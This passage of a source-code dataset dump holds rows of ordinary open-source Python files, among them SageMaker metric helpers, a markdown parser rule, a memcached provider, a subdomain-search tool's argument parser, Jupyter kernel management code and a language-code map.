Render.setup()\n"},"size":{"kind":"number","value":523,"string":"523"}}},{"rowIdx":887,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/sagemaker_algorithm_toolkit/metrics.py"},"max_stars_repo_name":{"kind":"string","value":"Chick-star/sagemaker-xgboost-container"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024423"},"content":{"kind":"string","value":"# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the 'License'). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the 'license' file accompanying this file. This file is\n# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\nfrom sagemaker_algorithm_toolkit import exceptions as exc\n\nimport logging\n\n\nclass Metric(object):\n MAXIMIZE = \"Maximize\"\n MINIMIZE = \"Minimize\"\n\n def __init__(self, name, regex, format_string=None, tunable=True, direction=None):\n self.name = name\n self.format_string = format_string\n self.direction = direction\n self.regex = regex\n self.tunable = tunable\n if self.tunable and direction is None:\n raise exc.AlgorithmError(\"direction must be specified if tunable is True.\")\n\n def log(self, value):\n logging.info(self.format_string.format(value))\n\n def format_tunable(self):\n return {\"MetricName\": self.name,\n \"Type\": self.direction}\n\n def format_definition(self):\n return {\"Name\": self.name,\n \"Regex\": self.regex}\n\n\nclass Metrics(object):\n def __init__(self, *metrics):\n self.metrics = {metric.name: metric for metric in metrics}\n\n def __getitem__(self, name):\n return self.metrics[name]\n\n @property\n def names(self):\n return list(self.metrics)\n\n def format_tunable(self):\n metrics = []\n for name, metric in self.metrics.items():\n if metric.tunable:\n metrics.append(metric.format_tunable())\n return metrics\n\n def format_definitions(self):\n return [metric.format_definition() for name, metric in self.metrics.items()]\n"},"size":{"kind":"number","value":1995,"string":"1,995"}}},{"rowIdx":888,"cells":{"max_stars_repo_path":{"kind":"string","value":"markdown_it/rules_inline/text.py"},"max_stars_repo_name":{"kind":"string","value":"iooxa/markdown-it-py"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024502"},"content":{"kind":"string","value":"# Skip text characters for text token, place those to pending buffer\n# and increment current pos\n\nfrom .state_inline import StateInline\nfrom ..common.utils import charCodeAt\n\n\n# Rule to skip pure text\n# '{}$%@~+=:' reserved for extentions\n\n# !, \", #, $, %, &, ', (, ), *, +, ,, -, ., /, :, ;, <, =, >, ?, @, [, \\, ], ^, _, `, {, |, }, or ~\n\n# !!!! Don't confuse with \"Markdown ASCII Punctuation\" chars\n# http://spec.commonmark.org/0.15/#ascii-punctuation-character\ndef isTerminatorChar(ch):\n return ch in {\n 0x0A, # /* \\n */:\n 0x21, # /* ! */:\n 0x23, # /* # */:\n 0x24, # /* $ */:\n 0x25, # /* % */:\n 0x26, # /* & */:\n 0x2A, # /* * */:\n 0x2B, # /* + */:\n 0x2D, # /* - */:\n 0x3A, # /* : */:\n 0x3C, # /* < */:\n 0x3D, # /* = */:\n 0x3E, # /* > */:\n 0x40, # /* @ */:\n 0x5B, # /* [ */:\n 0x5C, # /* \\ */:\n 0x5D, # /* ] */:\n 0x5E, # /* ^ */:\n 0x5F, # /* _ */:\n 0x60, # /* ` */:\n 0x7B, # /* { */:\n 0x7D, # /* } */:\n 0x7E, # /* ~ */:\n }\n\n\ndef text(state: StateInline, silent: bool, **args):\n pos = state.pos\n\n while (pos < state.posMax) and not isTerminatorChar(charCodeAt(state.src, pos)):\n pos += 1\n\n if pos == state.pos:\n return False\n\n if not silent:\n state.pending += state.src[state.pos : pos]\n\n state.pos = pos\n\n return True\n"},"size":{"kind":"number","value":1449,"string":"1,449"}}},{"rowIdx":889,"cells":{"max_stars_repo_path":{"kind":"string","value":"pysimplecache/providers/memcached.py"},"max_stars_repo_name":{"kind":"string","value":"stajkowski/py-simple-cache"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024242"},"content":{"kind":"string","value":"import bmemcached\nimport os\nfrom pysimplecache.providers.base_provider import BaseProvider, \\\n UnhandledCachingException\n\n\nclass MemcachedProvider(BaseProvider):\n \"\"\" Memcached Provider \"\"\"\n\n def __init__(self, conversion, username=None, password=None,\n servers=None, enabled=True):\n \"\"\" Memcached Provider\n\n :param conversion: class for data conversion\n :param username: str memcached username\n :param password: str memcached password\n :param servers: str memcached servers (comma separated)\n :param enabled: bool if caching is enabled\n \"\"\"\n self.conversion = conversion\n self.cache_enabled = bool(os.getenv('MEMCACHEDCLOUD_ENABLED', enabled))\n self.cache_server = os.getenv('MEMCACHEDCLOUD_SERVERS', servers)\n self.cache_user = os.getenv('MEMCACHEDCLOUD_USERNAME', username)\n self.cache_pass = os.getenv('MEMCACHEDCLOUD_PASSWORD', password)\n self._client = self._setup_client()\n\n def _setup_client(self):\n \"\"\" Setup memcached client\n\n :return: obj memcached client\n \"\"\"\n if self.cache_enabled:\n try:\n if self.cache_user and self.cache_pass:\n return bmemcached.Client(\n self.cache_server.split(','),\n self.cache_user,\n self.cache_pass)\n else:\n return bmemcached.Client(\n self.cache_server.split(','))\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n\n return None\n\n def get(self, key, ttl, method, **kwargs):\n \"\"\" Get cached data or call passed method\n\n :param key: str key value for cached data\n :param ttl: int ttl value for cached data\n :param method: obj method call for cache miss\n :param kwargs: parameters to pass into method\n :return: data, bool cache miss\n :raises: UnhandledCachingException\n \"\"\"\n if self._client:\n try:\n data = self._client.get(key)\n # if cache hit then return data decoded and if no\n # data present in cache, call method with passed\n # arguments and store in cache\n if data:\n return self.conversion.decode(data), False\n else:\n # if method is passed, load data and pass into\n # memcached with key\n if method is not None:\n data = method(**kwargs)\n self.put(key, ttl, data)\n return data, True\n else:\n return None, True\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n finally:\n self._client.disconnect_all()\n\n def put(self, key, ttl, data):\n \"\"\" Put data into cache with passed ttl from referenced method\n\n :param key: str key value for cached data\n :param ttl: int ttl value for cached data\n :param data: data to pass into cache\n :return: None\n :raises: UnhandledCachingException\n \"\"\"\n if self._client:\n try:\n self._client.set(key, self.conversion.encode(data), ttl)\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n finally:\n self._client.disconnect_all()\n\n def delete(self, key):\n \"\"\" Delete cached data with passed key\n\n :param key: str key value for cached data\n :return: None\n :raises: UnhandledCachingException\n \"\"\"\n if self._client:\n try:\n self._client.delete(key)\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n finally:\n self._client.disconnect_all()\n"},"size":{"kind":"number","value":4247,"string":"4,247"}}},{"rowIdx":890,"cells":{"max_stars_repo_path":{"kind":"string","value":"subseeker_core/options.py"},"max_stars_repo_name":{"kind":"string","value":"DFC302/subseeker"},"max_stars_count":{"kind":"number","value":19,"string":"19"},"id":{"kind":"string","value":"2022820"},"content":{"kind":"string","value":"# This file contains information regarding command line arguments, title\n# information and version information.\n\nimport argparse\nimport sys\nfrom termcolor import colored\n\n# User options\ndef options():\n\tparser = argparse.ArgumentParser()\n\n\t# specify domain\n\tparser.add_argument(\n\t\t\"--domain\",\n\t\thelp=\"Specify domain to search.\",\n\t\taction=\"store\",\n\t)\n\n\t# single search mode\n\tparser.add_argument(\n\t\t\"--singlesearch\",\n\t\thelp=\"Search using a specific certificate site. Use --singlesearch options to list available search options.\",\n\t\taction=\"store\",\n\t\ttype=str,\n\t)\n\n\t# User can specify keywords instead of a file full of sub keywords\n\tparser.add_argument(\n\t\t\"--keywords\",\n\t\tnargs=\"+\",\n\t\thelp=\"Add a list of keywords.\",\n\t\ttype=str,\n\t)\n\n\t# Parse subdomain keywords from other tools output files\n\tparser.add_argument(\n\t\t\"--generate\",\n\t\thelp=\"Create a list of sub domain keywords from a file containing \\\n\t\tsubdomains.\",\n\t\taction=\"store_true\",\n\t)\n\n\t# search domain using subdomain keywords from file\n\tparser.add_argument(\n\t\t\"--file\",\n\t\thelp=\"Specify a file containing keywords to parse crt.sh OR to create \\\n\t\tsub keywords from.\",\n\t\taction=\"store\",\n\t)\n\n\t# Write to output file\n\tparser.add_argument(\n\t\t\"--out\",\n\t\thelp=\"Specify a file to write results too.\",\n\t\taction=\"store\",\n\t)\n\n\t# User specify number of threads\n\tparser.add_argument(\n\t\t\"--threads\",\n\t\thelp=\"Specify number of threads to be used when performing keyword \\\n\t\tsearch.\",\n\t\taction=\"store\",\n\t\ttype=int,\n\t)\n\n\t# Try with different headers, firefox, chrome, opera\n\tparser.add_argument(\n\t\t\"--useragent\",\n\t\thelp=\"Specify a user-agent to use. Default is a firefox UA.\",\n\t\taction=\"store\",\n\t\ttype=str\n\t)\n\n\t# If API information has been configured, allow use of API credentials\n\tparser.add_argument(\n\t\t\"--api\",\n\t\thelp=\"Turn on api.\",\n\t\taction=\"store_true\",\n\t)\n\n\t# Specify page number for certdb and/or censys\n\tparser.add_argument(\n\t\t\"--page\",\n\t\thelp=\"Used with certdb and/or censys searchmodes. Specify page number to display.\",\n\t\taction=\"store\",\n\t\ttype=int,\n\t)\n\n\tparser.add_argument(\n\t\t\"--version\",\n\t\thelp=\"Display version information\",\n\t\taction=\"store_true\",\n\t)\n\n\tparser.add_argument(\n\t\t\"--verbose\",\n\t\thelp=\"Display extra verbose information, such as errors.\",\n\t\taction=\"store_true\",\n\t)\n\n\t# if not arguments are given, print usage message\n\tif len(sys.argv[1:]) == 0:\n\t\tparser.print_help()\n\t\tparser.exit()\n\n\targs = parser.parse_args()\n\n\treturn args"},"size":{"kind":"number","value":2391,"string":"2,391"}}},{"rowIdx":891,"cells":{"max_stars_repo_path":{"kind":"string","value":"sdk/identity/azure-identity/tests/test_imds.py"},"max_stars_repo_name":{"kind":"string","value":"kushan2018/azure-sdk-for-python"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024566"},"content":{"kind":"string","value":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom azure.identity._internal import ImdsCredential\n\n\ndef test_imds_credential():\n credential = ImdsCredential()\n token = credential.get_token(\"https://management.azure.com/.default\")\n assert token\n"},"size":{"kind":"number","value":358,"string":"358"}}},{"rowIdx":892,"cells":{"max_stars_repo_path":{"kind":"string","value":"String Conversion.py"},"max_stars_repo_name":{"kind":"string","value":"Darkhunter9/python"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023205"},"content":{"kind":"string","value":"def steps_to_convert(line1,line2):\n def compare(line1,line2,i):\n tempdict = {}\n for j in range(len(line1)):\n if line1[j] in line2:\n try:\n tempdict[i+j] = line2.index(line1[j],max(tempdict.values()) if tempdict else 0)\n except Exception:\n continue\n return tempdict\n\n def calculate(line1,line2,similardict):\n result = 0\n temp3 = -1\n temp4 = -1\n while similardict:\n result += max(min(similardict.keys())-1-temp3,similardict[min(similardict.keys())]-temp4-1)\n temp3 = min(similardict.keys())\n temp4 = similardict[min(similardict.keys())]\n similardict.pop(min(similardict.keys()))\n result += max(len(line1)-temp3-1,len(line2)-temp4-1) \n return result\n\n result = None\n for i in range(len(line1)):\n tempdict = {}\n tempdict = compare(line1[i:],line2,i)\n if result == None:\n result = calculate(line1,line2,tempdict)\n else:\n result = min(result,calculate(line1,line2,tempdict))\n for i in range(len(line2)):\n tempdict = {}\n tempdict = compare(line2[i:],line1,i)\n if result == None:\n result = calculate(line2,line1,tempdict)\n else:\n result = min(result,calculate(line2,line1,tempdict))\n \n if result == None:\n return 0\n else:\n return result\n\n\nif __name__ == \"__main__\":\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert steps_to_convert('line1', 'line1') == 0, \"eq\"\n assert steps_to_convert('line1', 'line2') == 1, \"2\"\n assert steps_to_convert('line', 'line2') == 1, \"none to 2\"\n assert steps_to_convert('ine', 'line2') == 2, \"need two more\"\n assert steps_to_convert('line1', '1enil') == 4, \"everything is opposite\"\n assert steps_to_convert('', '') == 0, \"two empty\"\n assert steps_to_convert('l', '') == 1, \"one side\"\n assert steps_to_convert('', 'l') == 1, \"another side\"\n print(\"You are good to go!\")\n"},"size":{"kind":"number","value":2088,"string":"2,088"}}},{"rowIdx":893,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/test_io.py"},"max_stars_repo_name":{"kind":"string","value":"sandralorenz268/hylite"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023268"},"content":{"kind":"string","value":"import unittest\nimport os\nfrom hylite import io\nfrom pathlib import Path\nfrom tempfile import mkdtemp\nimport shutil\n\nclass TestHyImage(unittest.TestCase):\n def test_load(self):\n self.img = io.load(os.path.join(str(Path(__file__).parent.parent), \"test_data/image.hdr\"))\n self.lib = io.load(os.path.join(str(Path(__file__).parent.parent), \"test_data/library.csv\"))\n self.cld = io.load(os.path.join(str(Path(__file__).parent.parent), \"test_data/hypercloud.hdr\"))\n\n def test_save(self):\n self.test_load() # load datasets\n for data in [self.img, self.lib, self.cld]:\n pth = mkdtemp()\n try:\n io.save(os.path.join(pth, \"data.hdr\"), data )\n shutil.rmtree(pth) # delete temp directory\n except:\n shutil.rmtree(pth) # delete temp directory\n self.assertFalse(True, \"Error - could not save data of type %s\" % str(type(data)))\n\nif __name__ == '__main__':\n unittest.main()"},"size":{"kind":"number","value":995,"string":"995"}}},{"rowIdx":894,"cells":{"max_stars_repo_path":{"kind":"string","value":"swap-random.py"},"max_stars_repo_name":{"kind":"string","value":"jonspeicher/blinkyfun"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023835"},"content":{"kind":"string","value":"#!/usr/bin/env python\n\nfrom blinkytape import tape, player\nfrom patterns import random\nfrom animations import swap\nimport sys\n\ntape = tape.BlinkyTape.find_first()\n\npattern = random.Random(tape.pixel_count)\n\nframe_period_sec = float(sys.argv[1])\nanimation = swap.Swap(pattern, frame_period_sec)\n\nplayer = player.Player(tape)\nplayer.play_animation(animation, player.FOREVER)\n"},"size":{"kind":"number","value":373,"string":"373"}}},{"rowIdx":895,"cells":{"max_stars_repo_path":{"kind":"string","value":"environment_kernels/core.py"},"max_stars_repo_name":{"kind":"string","value":"Cadair/jupyter_conda_kernels"},"max_stars_count":{"kind":"number","value":150,"string":"150"},"id":{"kind":"string","value":"2024180"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport os\nimport os.path\n\nfrom jupyter_client.kernelspec import (KernelSpecManager, NoSuchKernel)\nfrom traitlets import List, Unicode, Bool, Int\n\nfrom .envs_conda import get_conda_env_data\nfrom .envs_virtualenv import get_virtualenv_env_data\nfrom .utils import FileNotFoundError, HAVE_CONDA\n\nENV_SUPPLYER = [get_conda_env_data, get_virtualenv_env_data]\n\n__all__ = ['EnvironmentKernelSpecManager']\n\n\nclass EnvironmentKernelSpecManager(KernelSpecManager):\n \"\"\"\n A Jupyter Kernel manager which dyamically checks for Environments\n\n Given a list of base directories, this class searches for the pattern::\n\n BASE_DIR/NAME/{bin|Skript}/ipython\n\n where NAME is taken to be the name of the environment.\n \"\"\"\n\n # Take the default home DIR for conda and virtualenv as the default\n _default_conda_dirs = ['~/.conda/envs/']\n _default_virtualenv_dirs = ['~/.virtualenvs']\n\n # Check for the CONDA_ENV_PATH variable and add it to the list if set.\n if os.environ.get('CONDA_ENV_PATH', False):\n _default_conda_dirs.append(os.environ['CONDA_ENV_PATH'].split('envs')[0])\n\n # If we are running inside the root conda env can get all the env dirs:\n if HAVE_CONDA:\n import conda\n _default_conda_dirs += conda.config.envs_dirs\n\n # Remove any duplicates\n _default_conda_dirs = list(set(map(os.path.expanduser,\n _default_conda_dirs)))\n\n conda_env_dirs = List(\n _default_conda_dirs,\n config=True,\n help=\"List of directories in which are conda environments.\")\n\n virtualenv_env_dirs = List(\n _default_virtualenv_dirs,\n config=True,\n help=\"List of directories in which are virtualenv environments.\")\n\n blacklist_envs = List(\n [\"conda__build\"],\n config=True,\n help=\"Environments which should not be used even if a ipykernel exists in it.\")\n\n whitelist_envs = List(\n [],\n config=True,\n help=\"Environments which should be used, all others are ignored (overwrites blacklist_envs).\")\n\n display_name_template = Unicode(\n u\"Environment ({})\",\n config=True,\n help=\"Template for the kernel name in the UI. Needs to include {} for the name.\")\n\n conda_prefix_template = Unicode(\n u\"conda_{}\",\n config=True,\n help=\"Template for the conda environment kernel name prefix in the UI. Needs to include {} for the name.\")\n\n virtualenv_prefix_template = Unicode(\n u\"virtualenv_{}\",\n config=True,\n help=\"Template for the virtualenv environment kernel name prefix in the UI. Needs to include {} for the name.\")\n\n find_conda_envs = Bool(\n True,\n config=True,\n help=\"Probe for conda environments, including calling conda itself.\")\n\n find_r_envs = Bool(\n True,\n config=True,\n help=\"Probe environments for R kernels (currently only conda environments).\")\n\n use_conda_directly = Bool(\n True,\n config=True,\n help=\"Probe for conda environments by calling conda itself. Only relevant if find_conda_envs is True.\")\n\n refresh_interval = Int(\n 3,\n config=True,\n help=\"Interval (in minutes) to refresh the list of environment kernels. Setting it to '0' disables the refresh.\")\n\n find_virtualenv_envs = Bool(True,\n config=True,\n help=\"Probe for virtualenv environments.\")\n\n def __init__(self, *args, **kwargs):\n super(EnvironmentKernelSpecManager, self).__init__(*args, **kwargs)\n self.log.info(\"Using EnvironmentKernelSpecManager...\")\n self._env_data_cache = {}\n if self.refresh_interval > 0:\n try:\n from tornado.ioloop import PeriodicCallback, IOLoop\n # Initial loading NOW\n IOLoop.current().call_later(0, callback=self._update_env_data, initial=True)\n # Later updates\n updater = PeriodicCallback(callback=self._update_env_data,\n callback_time=1000 * 60 * self.refresh_interval)\n updater.start()\n if not updater.is_running():\n raise Exception()\n self._periodic_updater = updater\n self.log.info(\"Started periodic updates of the kernel list (every %s minutes).\", self.refresh_interval)\n except:\n self.log.exception(\"Error while trying to enable periodic updates of the kernel list.\")\n else:\n self.log.info(\"Periodical updates the kernel list are DISABLED.\")\n\n def validate_env(self, envname):\n \"\"\"\n Check the name of the environment against the black list and the\n whitelist. If a whitelist is specified only it is checked.\n \"\"\"\n if self.whitelist_envs and envname in self.whitelist_envs:\n return True\n elif self.whitelist_envs:\n return False\n\n if self.blacklist_envs and envname not in self.blacklist_envs:\n return True\n elif self.blacklist_envs:\n # If there is just a True, all envs are blacklisted\n return False\n else:\n return True\n\n def _update_env_data(self, initial=False):\n if initial:\n self.log.info(\"Starting initial scan of virtual environments...\")\n else:\n self.log.debug(\"Starting periodic scan of virtual environments...\")\n self._get_env_data(reload=True)\n self.log.debug(\"done.\")\n\n def _get_env_data(self, reload=False):\n \"\"\"Get the data about the available environments.\n\n env_data is a structure {name -> (resourcedir, kernel spec)}\n \"\"\"\n\n # This is called much too often and finding-process is really expensive :-(\n if not reload and getattr(self, \"_env_data_cache\", {}):\n return getattr(self, \"_env_data_cache\")\n\n env_data = {}\n for supplyer in ENV_SUPPLYER:\n env_data.update(supplyer(self))\n\n env_data = {name: env_data[name] for name in env_data if self.validate_env(name)}\n new_kernels = [env for env in list(env_data.keys()) if env not in list(self._env_data_cache.keys())]\n if new_kernels:\n self.log.info(\"Found new kernels in environments: %s\", \", \".join(new_kernels))\n\n self._env_data_cache = env_data\n return env_data\n\n def find_kernel_specs_for_envs(self):\n \"\"\"Returns a dict mapping kernel names to resource directories.\"\"\"\n data = self._get_env_data()\n return {name: data[name][0] for name in data}\n\n def get_all_kernel_specs_for_envs(self):\n \"\"\"Returns the dict of name -> kernel_spec for all environments\"\"\"\n\n data = self._get_env_data()\n return {name: data[name][1] for name in data}\n\n def find_kernel_specs(self):\n \"\"\"Returns a dict mapping kernel names to resource directories.\"\"\"\n # let real installed kernels overwrite envs with the same name:\n # this is the same order as the get_kernel_spec way, which also prefers\n # kernels from the jupyter dir over env kernels.\n specs = self.find_kernel_specs_for_envs()\n specs.update(super(EnvironmentKernelSpecManager,\n self).find_kernel_specs())\n return specs\n\n def get_all_specs(self):\n \"\"\"Returns a dict mapping kernel names and resource directories.\n \"\"\"\n # This is new in 4.1 -> https://github.com/jupyter/jupyter_client/pull/93\n specs = self.get_all_kernel_specs_for_envs()\n specs.update(super(EnvironmentKernelSpecManager, self).get_all_specs())\n return specs\n\n def get_kernel_spec(self, kernel_name):\n \"\"\"Returns a :class:`KernelSpec` instance for the given kernel_name.\n\n Raises :exc:`NoSuchKernel` if the given kernel name is not found.\n \"\"\"\n try:\n return super(EnvironmentKernelSpecManager,\n self).get_kernel_spec(kernel_name)\n except (NoSuchKernel, FileNotFoundError):\n venv_kernel_name = kernel_name.lower()\n specs = self.get_all_kernel_specs_for_envs()\n if venv_kernel_name in specs:\n return specs[venv_kernel_name]\n else:\n raise NoSuchKernel(kernel_name)\n"},"size":{"kind":"number","value":8388,"string":"8,388"}}},{"rowIdx":896,"cells":{"max_stars_repo_path":{"kind":"string","value":"geoometa/schema/references.py"},"max_stars_repo_name":{"kind":"string","value":"deniskolokol/geoo-meta"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024369"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\n\"\"\"Reference data used in index creation.\"\"\"\n\n# Lang mapping to ISO 639-1 (from ISO 639-2 or anyting else)\n# for all commonly known languaes.\n# Source: https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes\nLANG_MAP = {\n \"aar\": \"aa\",\n \"abk\": \"ab\",\n \"ave\": \"ae\",\n \"afr\": \"af\",\n \"aka\": \"ak\",\n \"amh\": \"am\",\n \"arg\": \"an\",\n \"ara\": \"ar\",\n \"asm\": \"as\",\n \"ava\": \"av\",\n \"aym\": \"ay\",\n \"aze\": \"az\",\n \"bak\": \"ba\",\n \"bel\": \"be\",\n \"bul\": \"bg\",\n \"bih\": \"bh\",\n \"bis\": \"bi\",\n \"bam\": \"bm\",\n \"ben\": \"bn\",\n \"bod\": \"bo\",\n \"tib\": \"bo\",\n \"bre\": \"br\",\n \"bos\": \"bs\",\n \"cat\": \"ca\",\n \"che\": \"ce\",\n \"cha\": \"ch\",\n \"cos\": \"co\",\n \"cre\": \"cr\",\n \"ces\": \"cs\",\n \"cze\": \"cs\",\n \"chu\": \"cu\",\n \"chv\": \"cv\",\n \"cym\": \"cy\",\n \"wel\": \"cy\",\n \"dan\": \"da\",\n \"deu\": \"de\",\n \"ger\": \"de\",\n \"div\": \"dv\",\n \"dzo\": \"dz\",\n \"ewe\": \"ee\",\n \"ell\": \"el\",\n \"gre\": \"el\",\n \"eng\": \"en\",\n \"epo\": \"eo\",\n \"spa\": \"es\",\n \"est\": \"et\",\n \"eus\": \"eu\",\n \"baq\": \"eu\",\n \"fas\": \"fa\",\n \"per\": \"fa\",\n \"ful\": \"ff\",\n \"fin\": \"fi\",\n \"fij\": \"fj\",\n \"fao\": \"fo\",\n \"fra\": \"fr\",\n \"fre\": \"fr\",\n \"fry\": \"fy\",\n \"gle\": \"ga\",\n \"gla\": \"gd\",\n \"glg\": \"gl\",\n \"grn\": \"gn\",\n \"guj\": \"gu\",\n \"glv\": \"gv\",\n \"hau\": \"ha\",\n \"heb\": \"he\",\n \"hin\": \"hi\",\n \"hmo\": \"ho\",\n \"hrv\": \"hr\",\n \"hat\": \"ht\",\n \"hun\": \"hu\",\n \"hye\": \"hy\",\n \"arm\": \"hy\",\n \"her\": \"hz\",\n \"ina\": \"ia\",\n \"ind\": \"id\",\n \"ile\": \"ie\",\n \"ibo\": \"ig\",\n \"iii\": \"ii\",\n \"ipk\": \"ik\",\n \"ido\": \"io\",\n \"isl\": \"is\",\n \"ice\": \"is\",\n \"ita\": \"it\",\n \"itl\": \"it\",\n \"iku\": \"iu\",\n \"jpn\": \"ja\",\n \"jav\": \"jv\",\n \"kat\": \"ka\",\n \"geo\": \"ka\",\n \"kon\": \"kg\",\n \"kik\": \"ki\",\n \"kua\": \"kj\",\n \"kaz\": \"kk\",\n \"kal\": \"kl\",\n \"khm\": \"km\",\n \"kan\": \"kn\",\n \"kor\": \"ko\",\n \"kau\": \"kr\",\n \"kas\": \"ks\",\n \"kur\": \"ku\",\n \"kom\": \"kv\",\n \"cor\": \"kw\",\n \"kir\": \"ky\",\n \"lat\": \"la\",\n \"ltz\": \"lb\",\n \"lug\": \"lg\",\n \"lim\": \"li\",\n \"lin\": \"ln\",\n \"lao\": \"lo\",\n \"lit\": \"lt\",\n \"lub\": \"lu\",\n \"lav\": \"lv\",\n \"mlg\": \"mg\",\n \"mah\": \"mh\",\n \"mri\": \"mi\",\n \"mao\": \"mi\",\n \"mkd\": \"mk\",\n \"mac\": \"mk\",\n \"mal\": \"ml\",\n \"mon\": \"mn\",\n \"mar\": \"mr\",\n \"msa\": \"ms\",\n \"may\": \"ms\",\n \"mlt\": \"mt\",\n \"mya\": \"my\",\n \"bur\": \"my\",\n \"nau\": \"na\",\n \"nob\": \"nb\",\n \"nde\": \"nd\",\n \"nep\": \"ne\",\n \"ndo\": \"ng\",\n \"nld\": \"nl\",\n \"dut\": \"nl\",\n \"nno\": \"nn\",\n \"nor\": \"no\",\n \"nbl\": \"nr\",\n \"nav\": \"nv\",\n \"nya\": \"ny\",\n \"oci\": \"oc\",\n \"oji\": \"oj\",\n \"orm\": \"om\",\n \"ori\": \"or\",\n \"oss\": \"os\",\n \"pan\": \"pa\",\n \"pli\": \"pi\",\n \"pol\": \"pl\",\n \"pus\": \"ps\",\n \"por\": \"pt\",\n \"que\": \"qu\",\n \"roh\": \"rm\",\n \"run\": \"rn\",\n \"ron\": \"ro\",\n \"rum\": \"ro\",\n \"rus\": \"ru\",\n \"kin\": \"rw\",\n \"san\": \"sa\",\n \"srd\": \"sc\",\n \"snd\": \"sd\",\n \"sme\": \"se\",\n \"sag\": \"sg\",\n \"sin\": \"si\",\n \"slk\": \"sk\",\n \"slo\": \"sk\",\n \"slv\": \"sl\",\n \"smo\": \"sm\",\n \"sna\": \"sn\",\n \"som\": \"so\",\n \"sqi\": \"sq\",\n \"alb\": \"sq\",\n \"srp\": \"sr\",\n \"ssw\": \"ss\",\n \"sot\": \"st\",\n \"sun\": \"su\",\n \"swe\": \"sv\",\n \"swa\": \"sw\",\n \"tam\": \"ta\",\n \"tel\": \"te\",\n \"tgk\": \"tg\",\n \"tha\": \"th\",\n \"tir\": \"ti\",\n \"tuk\": \"tk\",\n \"tgl\": \"tl\",\n \"tsn\": \"tn\",\n \"ton\": \"to\",\n \"tur\": \"tr\",\n \"tso\": \"ts\",\n \"tat\": \"tt\",\n \"twi\": \"tw\",\n \"tah\": \"ty\",\n \"uig\": \"ug\",\n \"ukr\": \"uk\",\n \"urd\": \"ur\",\n \"uzb\": \"uz\",\n \"ven\": \"ve\",\n \"vie\": \"vi\",\n \"vol\": \"vo\",\n \"wln\": \"wa\",\n \"wol\": \"wo\",\n \"xho\": \"xh\",\n \"yid\": \"yi\",\n \"yor\": \"yo\",\n \"zha\": \"za\",\n \"zho\": \"zh\",\n \"chi\": \"zh\",\n \"zul\": \"zu\"\n }\n\n\n# Language fields by ISO 639-1 codes.\nLANG_FIELDS = {\n \"en\": {\"type\": \"text\", \"analyzer\": \"english\"},\n \"cz\": {\"type\": \"text\", \"analyzer\": \"czech\"},\n \"gr\": {\"type\": \"text\", \"analyzer\": \"greek\"},\n \"es\": {\"type\": \"text\", \"analyzer\": \"spanish\"},\n \"fi\": {\"type\": \"text\", \"analyzer\": \"finnish\"},\n \"it\": {\"type\": \"text\", \"analyzer\": \"italian\"},\n \"lv\": {\"type\": \"text\", \"analyzer\": \"latvian\"},\n \"ar\": {\"type\": \"text\", \"analyzer\": \"arabic\"},\n \"hy\": {\"type\": \"text\", \"analyzer\": \"armenian\"},\n \"eu\": {\"type\": \"text\", \"analyzer\": \"basque\"},\n \"bn\": {\"type\": \"text\", \"analyzer\": \"bengali\"},\n \"bg\": {\"type\": \"text\", \"analyzer\": \"bulgarian\"},\n \"ca\": {\"type\": \"text\", \"analyzer\": \"catalan\"},\n \"nl\": {\"type\": \"text\", \"analyzer\": \"dutch\"},\n \"fr\": {\"type\": \"text\", \"analyzer\": \"french\"},\n \"gl\": {\"type\": \"text\", \"analyzer\": \"galician\"},\n \"de\": {\"type\": \"text\", \"analyzer\": \"german\"},\n \"hi\": {\"type\": \"text\", \"analyzer\": \"hindi\"},\n \"hu\": {\"type\": \"text\", \"analyzer\": \"hungarian\"},\n \"id\": {\"type\": \"text\", \"analyzer\": \"indonesian\"},\n \"ga\": {\"type\": \"text\", \"analyzer\": \"irish\"},\n \"lt\": {\"type\": \"text\", \"analyzer\": \"lithuanian\"},\n \"nb\": {\"type\": \"text\", \"analyzer\": \"norwegian\"},\n \"pt\": {\"type\": \"text\", \"analyzer\": \"portuguese\"},\n \"ro\": {\"type\": \"text\", \"analyzer\": \"romanian\"},\n \"ru\": {\"type\": \"text\", \"analyzer\": \"russian\"},\n \"ku\": {\"type\": \"text\", \"analyzer\": \"sorani\"},\n \"cv\": {\"type\": \"text\", \"analyzer\": \"swedish\"},\n \"tr\": {\"type\": \"text\", \"analyzer\": \"turkish\"}\n }\n"},"size":{"kind":"number","value":5277,"string":"5,277"}}},{"rowIdx":897,"cells":{"max_stars_repo_path":{"kind":"string","value":"knrm/utils/base_conf.py"},"max_stars_repo_name":{"kind":"string","value":"gsgoncalves/K-NRM"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023093"},"content":{"kind":"string","value":"# Copyright (c) 2017, University. All rights reserved.\n#\n# Use of the K-NRM package is subject 